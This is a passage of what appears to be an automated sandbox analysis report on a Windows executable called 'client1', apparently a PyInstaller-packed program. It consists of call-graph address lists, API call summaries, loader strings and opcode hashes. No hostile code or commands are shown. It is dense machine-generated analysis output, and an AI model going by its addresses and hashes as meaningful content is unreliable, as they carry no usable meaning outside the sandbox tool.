16888 7ff79f634444 _findclose 11 API calls 16886->16888 16887->15171 16888->16887 16910 7ff79f63f788 EnterCriticalSection 16897->16910 17258 7ff79f637968 17257->17258 17261 7ff79f637444 17258->17261 17260 7ff79f637981 17260->15181 17262 7ff79f63748e 17261->17262 17263 7ff79f63745f 17261->17263 17271 7ff79f6342ec EnterCriticalSection 17262->17271 17264 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 17263->17264 17266 7ff79f63747f 17264->17266 17266->17260 17273 7ff79f62f0d1 17272->17273 17274 7ff79f62f0a3 17272->17274 17278 7ff79f62f0c3 17273->17278 17282 7ff79f6342ec EnterCriticalSection 17273->17282 17275 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 17274->17275 17275->17278 17278->15185 17284 7ff79f6212f8 17283->17284 17285 7ff79f6212c6 17283->17285 17287 7ff79f62f934 73 API calls 17284->17287 17286 7ff79f623cb0 116 API calls 17285->17286 17289 7ff79f6212d6 17286->17289 17288 7ff79f62130a 17287->17288 17290 7ff79f62130e 17288->17290 17291 7ff79f62132f 17288->17291 17289->17284 17292 7ff79f6212de 17289->17292 17293 7ff79f6224d0 59 API calls 17290->17293 17297 7ff79f621364 17291->17297 17298 7ff79f621344 17291->17298 17294 7ff79f622770 59 API calls 17292->17294 17295 7ff79f621325 17293->17295 17296 7ff79f6212ee 17294->17296 17295->15195 17296->15195 17300 7ff79f62137e 17297->17300 17304 7ff79f621395 17297->17304 17299 7ff79f6224d0 59 API calls 17298->17299 17306 7ff79f62135f __std_exception_destroy 17299->17306 17301 7ff79f621050 98 API calls 17300->17301 17301->17306 17302 7ff79f62f5fc _fread_nolock 53 API calls 17302->17304 17303 7ff79f621421 17303->15195 17304->17302 17304->17306 17307 7ff79f6213de 17304->17307 17305 7ff79f62f2ac 74 API calls 17305->17303 17306->17303 17306->17305 17308 7ff79f6224d0 59 API calls 17307->17308 17308->17306 17310 7ff79f621b30 49 API calls 17309->17310 17311 7ff79f623d60 17310->17311 17311->15197 17313 7ff79f6216aa 17312->17313 17314 7ff79f621666 17312->17314 17313->15214 17314->17313 17315 7ff79f622770 59 API calls 17314->17315 17316 7ff79f6216be 17315->17316 17316->15214 17318 7ff79f627a30 57 API calls 17317->17318 17319 7ff79f6271c7 LoadLibraryExW 17318->17319 17320 7ff79f6271e4 __std_exception_destroy 17319->17320 17320->15222 17321->15297 17322->15296 17324 7ff79f624970 17323->17324 17325 7ff79f621b30 49 API calls 17324->17325 17326 7ff79f6249a2 17325->17326 17327 7ff79f6249cb 17326->17327 17328 7ff79f6249ab 17326->17328 17330 7ff79f624a22 17327->17330 17332 7ff79f623d30 49 API calls 17327->17332 17329 7ff79f622770 59 API calls 17328->17329 17333 7ff79f6249c1 17329->17333 17331 7ff79f623d30 49 API calls 17330->17331 17338 7ff79f624a3b 17331->17338 17334 7ff79f6249ec 17332->17334 17336 7ff79f62ad80 _wfindfirst32i64 8 API calls 17333->17336 17335 7ff79f624a0a 17334->17335 17339 7ff79f622770 59 API calls 17334->17339 17408 7ff79f623c40 17335->17408 17341 7ff79f6230be 17336->17341 17337 7ff79f624a59 17343 7ff79f6271b0 58 API calls 17337->17343 17338->17337 17342 7ff79f622770 59 API calls 17338->17342 17339->17335 17341->15307 17351 7ff79f624ce0 17341->17351 17342->17337 17345 7ff79f624a66 17343->17345 17346 7ff79f624a6b 17345->17346 17347 7ff79f624a8d 17345->17347 17348 7ff79f622620 57 API calls 17346->17348 17414 7ff79f623df0 GetProcAddress 17347->17414 17348->17333 17350 7ff79f6271b0 58 API calls 17350->17330 17352 7ff79f626990 61 API calls 17351->17352 17354 7ff79f624cf5 17352->17354 17353 7ff79f624d10 17355 7ff79f627a30 57 API calls 17353->17355 17354->17353 17356 7ff79f622880 59 API calls 17354->17356 17357 7ff79f624d54 17355->17357 17356->17353 17358 7ff79f624d59 17357->17358 17359 7ff79f624d70 17357->17359 17360 7ff79f622770 59 API calls 17358->17360 17362 7ff79f627a30 57 API calls 17359->17362 17361 7ff79f624d65 17360->17361 17361->15309 17363 7ff79f624da5 17362->17363 17365 7ff79f621b30 49 API calls 17363->17365 17377 7ff79f624daa __std_exception_destroy 17363->17377 17364 7ff79f622770 59 API calls 17366 7ff79f624f51 17364->17366 17367 7ff79f624e27 17365->17367 17366->15309 17368 7ff79f624e2e 17367->17368 17369 7ff79f624e53 17367->17369 17370 7ff79f622770 59 API calls 17368->17370 17371 7ff79f627a30 57 API calls 17369->17371 17377->17364 17378 7ff79f624f3a 17377->17378 17378->15309 17380 7ff79f6246f7 17379->17380 17380->17380 17381 7ff79f624720 17380->17381 17388 7ff79f624737 __std_exception_destroy 17380->17388 17409 7ff79f623c4a 17408->17409 17410 7ff79f627a30 57 API calls 17409->17410 17411 7ff79f623c72 17410->17411 17412 7ff79f62ad80 _wfindfirst32i64 8 API calls 17411->17412 17413 7ff79f623c9a 17412->17413 17413->17330 17413->17350 17415 7ff79f623e18 17414->17415 17416 7ff79f623e3b GetProcAddress 17414->17416 17418 7ff79f622620 57 API calls 17415->17418 17416->17415 17417 7ff79f623e60 GetProcAddress 17416->17417 17417->17415 17419 7ff79f623e85 GetProcAddress 17417->17419 17420 7ff79f623e2b 17418->17420 17419->17415 17421 7ff79f623ead GetProcAddress 17419->17421 17420->17333 17421->17415 17422 7ff79f623ed5 GetProcAddress 17421->17422 17422->17415 17423 7ff79f623efd GetProcAddress 17422->17423 17424 7ff79f623f19 17423->17424 17425 7ff79f623f25 GetProcAddress 17423->17425 17424->17425 17426 7ff79f623f4d GetProcAddress 17425->17426 17427 7ff79f623f41 17425->17427 17428 7ff79f623f69 17426->17428 17427->17426 17429 7ff79f623f7d GetProcAddress 17428->17429 17430 7ff79f623fa5 GetProcAddress 17428->17430 17429->17430 17689 7ff79f63a620 _CreateFrameInfo 45 API calls 17688->17689 17690 7ff79f6390e1 17689->17690 17691 7ff79f63920c _CreateFrameInfo 45 API calls 17690->17691 17692 7ff79f639101 17691->17692 19249 7ff79f63a4a0 19250 7ff79f63a4a5 19249->19250 19254 7ff79f63a4ba 19249->19254 19255 7ff79f63a4c0 19250->19255 19256 7ff79f63a50a 19255->19256 19257 7ff79f63a502 19255->19257 19259 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19256->19259 19258 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19257->19258 19258->19256 19260 7ff79f63a517 19259->19260 19261 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19260->19261 19262 7ff79f63a524 19261->19262 19263 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19262->19263 19264 7ff79f63a531 19263->19264 19265 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19264->19265 19266 7ff79f63a53e 19265->19266 19267 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19266->19267 19268 7ff79f63a54b 19267->19268 19269 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19268->19269 19270 7ff79f63a558 19269->19270 19271 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19270->19271 19272 7ff79f63a565 19271->19272 19273 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19272->19273 19274 7ff79f63a575 19273->19274 19275 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19274->19275 19276 7ff79f63a585 19275->19276 19281 7ff79f63a364 19276->19281 19295 7ff79f63f788 EnterCriticalSection 19281->19295 17698 7ff79f62a620 17699 7ff79f62a643 17698->17699 17700 7ff79f62a65f memcpy_s 17698->17700 17701 7ff79f63cacc 12 API calls 17699->17701 17701->17700

                                                    Executed Functions

                                                    Function 00007FF79F644E20 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 135 7ff79f644e20-7ff79f644e5b call 7ff79f6447a8 call 7ff79f6447b0 call 7ff79f644818 142 7ff79f644e61-7ff79f644e6c call 7ff79f6447b8 135->142 143 7ff79f645085-7ff79f6450d1 call 7ff79f639dd0 call 7ff79f6447a8 call 7ff79f6447b0 call 7ff79f644818 135->143 142->143 148 7ff79f644e72-7ff79f644e7c 142->148 170 7ff79f6450d7-7ff79f6450e2 call 7ff79f6447b8 143->170 171 7ff79f64520f-7ff79f64527d call 7ff79f639dd0 call 7ff79f6406b8 143->171 150 7ff79f644e9e-7ff79f644ea2 148->150 151 7ff79f644e7e-7ff79f644e81 148->151 155 7ff79f644ea5-7ff79f644ead 150->155 154 7ff79f644e84-7ff79f644e8f 151->154 157 7ff79f644e9a-7ff79f644e9c 154->157 158 7ff79f644e91-7ff79f644e98 154->158 155->155 159 7ff79f644eaf-7ff79f644ec2 call 7ff79f63cacc 155->159 157->150 161 7ff79f644ecb-7ff79f644ed9 157->161 158->154 158->157 165 7ff79f644eda-7ff79f644ee6 call 7ff79f639e18 159->165 166 7ff79f644ec4-7ff79f644ec6 call 7ff79f639e18 159->166 175 7ff79f644eed-7ff79f644ef5 165->175 166->161 170->171 179 7ff79f6450e8-7ff79f6450f3 call 7ff79f6447e8 170->179 189 7ff79f64528b-7ff79f64528e 171->189 190 7ff79f64527f-7ff79f645286 171->190 175->175 178 7ff79f644ef7-7ff79f644f08 call 7ff79f63f924 175->178 178->143 187 7ff79f644f0e-7ff79f644f64 call 7ff79f62c210 * 4 call 7ff79f644d3c 178->187 179->171 188 7ff79f6450f9-7ff79f64511c call 7ff79f639e18 GetTimeZoneInformation 179->188 247 7ff79f644f66-7ff79f644f6a 187->247 206 7ff79f645122-7ff79f645143 188->206 207 7ff79f6451e4-7ff79f64520e call 7ff79f6447a0 call 7ff79f644790 call 7ff79f644798 188->207 192 7ff79f645290 189->192 193 7ff79f6452c5-7ff79f6452d8 call 7ff79f63cacc 189->193 195 7ff79f64531b-7ff79f64531e 190->195 198 7ff79f645293 192->198 210 7ff79f6452da 193->210 211 7ff79f6452e3-7ff79f6452fe call 7ff79f6406b8 193->211 197 7ff79f645324-7ff79f64532c call 7ff79f644e20 195->197 195->198 203 7ff79f645298-7ff79f6452c4 call 7ff79f639e18 call 7ff79f62ad80 197->203 198->203 204 7ff79f645293 call 7ff79f64509c 198->204 204->203 214 7ff79f64514e-7ff79f645155 206->214 215 7ff79f645145-7ff79f64514b 206->215 220 7ff79f6452dc-7ff79f6452e1 call 7ff79f639e18 210->220 235 7ff79f645300-7ff79f645303 211->235 236 7ff79f645305-7ff79f645317 call 7ff79f639e18 211->236 217 7ff79f645169 214->217 218 7ff79f645157-7ff79f64515f 214->218 215->214 224 7ff79f64516b-7ff79f6451df call 7ff79f62c210 * 4 call 7ff79f641c7c call 7ff79f645334 * 2 217->224 218->217 226 7ff79f645161-7ff79f645167 218->226 220->192 224->207 226->224 235->220 236->195 249 7ff79f644f6c 247->249 250 7ff79f644f70-7ff79f644f74 247->250 249->250 250->247 252 7ff79f644f76-7ff79f644f9b call 7ff79f647c64 250->252 258 7ff79f644f9e-7ff79f644fa2 252->258 260 7ff79f644fb1-7ff79f644fb5 258->260 261 7ff79f644fa4-7ff79f644faf 258->261 260->258 261->260 263 7ff79f644fb7-7ff79f644fbb 261->263 266 7ff79f644fbd-7ff79f644fe5 call 7ff79f647c64 263->266 267 7ff79f64503c-7ff79f645040 263->267 275 7ff79f644fe7 266->275 276 7ff79f645003-7ff79f645007 266->276 269 7ff79f645047-7ff79f645054 267->269 270 7ff79f645042-7ff79f645044 267->270 272 7ff79f64506f-7ff79f64507e call 7ff79f6447a0 call 7ff79f644790 269->272 273 7ff79f645056-7ff79f64506c call 7ff79f644d3c 269->273 270->269 272->143 273->272 279 7ff79f644fea-7ff79f644ff1 275->279 276->267 281 7ff79f645009-7ff79f645027 call 7ff79f647c64 276->281 279->276 282 7ff79f644ff3-7ff79f645001 279->282 287 7ff79f645033-7ff79f64503a 281->287 282->276 282->279 287->267 288 7ff79f645029-7ff79f64502d 287->288 288->267 289 7ff79f64502f 288->289 289->287
                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF79F644E65
                                                      • Part of subcall function 00007FF79F6447B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447CC
                                                      • Part of subcall function 00007FF79F639E18: RtlFreeHeap.NTDLL(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                      • Part of subcall function 00007FF79F639DD0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF79F639DAF,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F639DD9
                                                      • Part of subcall function 00007FF79F639DD0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF79F639DAF,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F639DFE
                                                    • _get_daylight.LIBCMT ref: 00007FF79F644E54
                                                      • Part of subcall function 00007FF79F644818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F64482C
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450CA
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450DB
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450EC
                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79F64532C), ref: 00007FF79F645113
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                    • API String ID: 4070488512-239921721
                                                    • Opcode ID: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
                                                    • Instruction ID: fcc2753484b5f486a54e18bddd1f7662d5bede607d47f748dcb017644e45245b
                                                    • Opcode Fuzzy Hash: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
                                                    • Instruction Fuzzy Hash: FAD1AE26A0878286E730BF35D9411F9A2AAFF85B94FD04136EE2D476C5DF3CE8418760
                                                    Function 00007FF79F645D6C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 320 7ff79f645d6c-7ff79f645ddf call 7ff79f645aa0 323 7ff79f645df9-7ff79f645e03 call 7ff79f636cfc 320->323 324 7ff79f645de1-7ff79f645dea call 7ff79f634424 320->324 329 7ff79f645e1e-7ff79f645e87 CreateFileW 323->329 330 7ff79f645e05-7ff79f645e1c call 7ff79f634424 call 7ff79f634444 323->330 331 7ff79f645ded-7ff79f645df4 call 7ff79f634444 324->331 333 7ff79f645e89-7ff79f645e8f 329->333 334 7ff79f645f04-7ff79f645f0f GetFileType 329->334 330->331 347 7ff79f64613a-7ff79f64615a 331->347 337 7ff79f645ed1-7ff79f645eff GetLastError call 7ff79f6343b8 333->337 338 7ff79f645e91-7ff79f645e95 333->338 340 7ff79f645f62-7ff79f645f69 334->340 341 7ff79f645f11-7ff79f645f4c GetLastError call 7ff79f6343b8 CloseHandle 334->341 337->331 338->337 345 7ff79f645e97-7ff79f645ecf CreateFileW 338->345 343 7ff79f645f6b-7ff79f645f6f 340->343 344 7ff79f645f71-7ff79f645f74 340->344 341->331 354 7ff79f645f52-7ff79f645f5d call 7ff79f634444 341->354 351 7ff79f645f7a-7ff79f645fcf call 7ff79f636c14 343->351 344->351 352 7ff79f645f76 344->352 345->334 345->337 359 7ff79f645fee-7ff79f64601f call 7ff79f645820 351->359 360 7ff79f645fd1-7ff79f645fdd call 7ff79f645ca8 351->360 352->351 354->331 365 7ff79f646021-7ff79f646023 359->365 366 7ff79f646025-7ff79f646067 359->366 360->359 367 7ff79f645fdf 360->367 368 7ff79f645fe1-7ff79f645fe9 call 7ff79f639f90 365->368 369 7ff79f646089-7ff79f646094 366->369 370 7ff79f646069-7ff79f64606d 366->370 367->368 368->347 373 7ff79f64609a-7ff79f64609e 369->373 374 7ff79f646138 369->374 370->369 372 7ff79f64606f-7ff79f646084 370->372 372->369 373->374 376 7ff79f6460a4-7ff79f6460e9 CloseHandle CreateFileW 373->376 374->347 377 7ff79f64611e-7ff79f646133 376->377 378 7ff79f6460eb-7ff79f646119 GetLastError call 7ff79f6343b8 call 7ff79f636e3c 376->378 377->374 378->377
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                    • String ID:
                                                    • API String ID: 1617910340-0
                                                    • Opcode ID: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                    • Instruction ID: 0ea52da5d498d6fa947fcb687aec398ebf56143a13dc56fbb48df1efb45d6f64
                                                    • Opcode Fuzzy Hash: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                    • Instruction Fuzzy Hash: B3C1A032B24B8286EB20FF75C4906ECB76AEB49B98B810235DA2E577D5CF39D451C710
                                                    Function 00007FF79F626780 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 139COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetTempPathW.KERNEL32(?,00000000,?,00007FF79F62674D), ref: 00007FF79F62681A
                                                      • Part of subcall function 00007FF79F626990: GetEnvironmentVariableW.KERNEL32(00007FF79F6236E7), ref: 00007FF79F6269CA
                                                      • Part of subcall function 00007FF79F626990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79F6269E7
                                                      • Part of subcall function 00007FF79F6366B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6366CD
                                                    • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF79F6268D1
                                                      • Part of subcall function 00007FF79F622770: MessageBoxW.USER32 ref: 00007FF79F622841
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                    • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                    • API String ID: 3752271684-1116378104
                                                    • Opcode ID: f94b85ae83cde5ff99a73dacb969786b4b90177c333bd4c8ae2eb3a11c31c338
                                                    • Instruction ID: b73e192bfc0180aee66994aca1c09f11a953c254c91d60ba9fbfde6821ca2ccd
                                                    • Opcode Fuzzy Hash: f94b85ae83cde5ff99a73dacb969786b4b90177c333bd4c8ae2eb3a11c31c338
                                                    • Instruction Fuzzy Hash: A1517811F197C340FA74BB7299552FAD25B9F4ABC4FC44031E82E87796EE6EE4018721
                                                    Function 00007FF79F64509C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 773 7ff79f64509c-7ff79f6450d1 call 7ff79f6447a8 call 7ff79f6447b0 call 7ff79f644818 780 7ff79f6450d7-7ff79f6450e2 call 7ff79f6447b8 773->780 781 7ff79f64520f-7ff79f64527d call 7ff79f639dd0 call 7ff79f6406b8 773->781 780->781 786 7ff79f6450e8-7ff79f6450f3 call 7ff79f6447e8 780->786 793 7ff79f64528b-7ff79f64528e 781->793 794 7ff79f64527f-7ff79f645286 781->794 786->781 792 7ff79f6450f9-7ff79f64511c call 7ff79f639e18 GetTimeZoneInformation 786->792 807 7ff79f645122-7ff79f645143 792->807 808 7ff79f6451e4-7ff79f64520e call 7ff79f6447a0 call 7ff79f644790 call 7ff79f644798 792->808 795 7ff79f645290 793->795 796 7ff79f6452c5-7ff79f6452d8 call 7ff79f63cacc 793->796 798 7ff79f64531b-7ff79f64531e 794->798 801 7ff79f645293 795->801 811 7ff79f6452da 796->811 812 7ff79f6452e3-7ff79f6452fe call 7ff79f6406b8 796->812 800 7ff79f645324-7ff79f64532c call 7ff79f644e20 798->800 798->801 805 7ff79f645298-7ff79f6452c4 call 7ff79f639e18 call 7ff79f62ad80 800->805 801->805 806 7ff79f645293 call 7ff79f64509c 801->806 806->805 814 7ff79f64514e-7ff79f645155 807->814 815 7ff79f645145-7ff79f64514b 807->815 820 7ff79f6452dc-7ff79f6452e1 call 7ff79f639e18 811->820 832 7ff79f645300-7ff79f645303 812->832 833 7ff79f645305-7ff79f645317 call 7ff79f639e18 812->833 817 7ff79f645169 814->817 818 7ff79f645157-7ff79f64515f 814->818 815->814 822 7ff79f64516b-7ff79f6451df call 7ff79f62c210 * 4 call 7ff79f641c7c call 7ff79f645334 * 2 817->822 818->817 824 7ff79f645161-7ff79f645167 818->824 820->795 822->808 824->822 832->820 833->798
                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450CA
                                                      • Part of subcall function 00007FF79F644818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F64482C
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450DB
                                                      • Part of subcall function 00007FF79F6447B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447CC
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450EC
                                                      • Part of subcall function 00007FF79F6447E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447FC
                                                      • Part of subcall function 00007FF79F639E18: RtlFreeHeap.NTDLL(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79F64532C), ref: 00007FF79F645113
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                    • API String ID: 3458911817-239921721
                                                    • Opcode ID: 74e2aae664cff904285b8cceaf5bd78e264b53cf78d1017760ee0a7f729cca6e
                                                    • Instruction ID: a796102b552945bb7b714767cf37b22a4ce92422f55e44ceb41ad888243889cb
                                                    • Opcode Fuzzy Hash: 74e2aae664cff904285b8cceaf5bd78e264b53cf78d1017760ee0a7f729cca6e
                                                    • Instruction Fuzzy Hash: A5515E32A187C286E730FF35E9815E9E76ABB49784FC44136EA6D43695DF3CE4018B60
                                                    Function 00007FF79F6217B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                    • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                    • API String ID: 2153230061-4158440160
                                                    • Opcode ID: 913ca2d16dd3917f3c6faf0798bc0d1b393c399123eb092558c7b1ba1e71a965
                                                    • Instruction ID: 9aac773805030bf4195233d69171114b75a8bd81207c8e60e0cba850760d5a67
                                                    • Opcode Fuzzy Hash: 913ca2d16dd3917f3c6faf0798bc0d1b393c399123eb092558c7b1ba1e71a965
                                                    • Instruction Fuzzy Hash: DF516F72A1978286EF24EF38D8901F8A3AAEB48B58B914135D92CC7395DF3CE540C751
                                                    Function 00007FF79F621440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 53 7ff79f621440-7ff79f621457 call 7ff79f626720 56 7ff79f621459-7ff79f621461 53->56 57 7ff79f621462-7ff79f621485 call 7ff79f626a40 53->57 60 7ff79f6214a7-7ff79f6214ad 57->60 61 7ff79f621487-7ff79f6214a2 call 7ff79f6224d0 57->61 63 7ff79f6214e0-7ff79f6214f4 call 7ff79f62f934 60->63 64 7ff79f6214af-7ff79f6214ba call 7ff79f623cb0 60->64 69 7ff79f621635-7ff79f621647 61->69 71 7ff79f621516-7ff79f62151a 63->71 72 7ff79f6214f6-7ff79f621511 call 7ff79f6224d0 63->72 70 7ff79f6214bf-7ff79f6214c5 64->70 70->63 73 7ff79f6214c7-7ff79f6214db call 7ff79f622770 70->73 75 7ff79f62151c-7ff79f621528 call 7ff79f621050 71->75 76 7ff79f621534-7ff79f621554 call 7ff79f6340b0 71->76 82 7ff79f621617-7ff79f62161d 72->82 73->82 83 7ff79f62152d-7ff79f62152f 75->83 87 7ff79f621556-7ff79f621570 call 7ff79f6224d0 76->87 88 7ff79f621575-7ff79f62157b 76->88 85 7ff79f62162b-7ff79f62162e call 7ff79f62f2ac 82->85 86 7ff79f62161f call 7ff79f62f2ac 82->86 83->82 96 7ff79f621633 85->96 95 7ff79f621624 86->95 99 7ff79f62160d-7ff79f621612 87->99 92 7ff79f621581-7ff79f621586 88->92 93 7ff79f621605-7ff79f621608 call 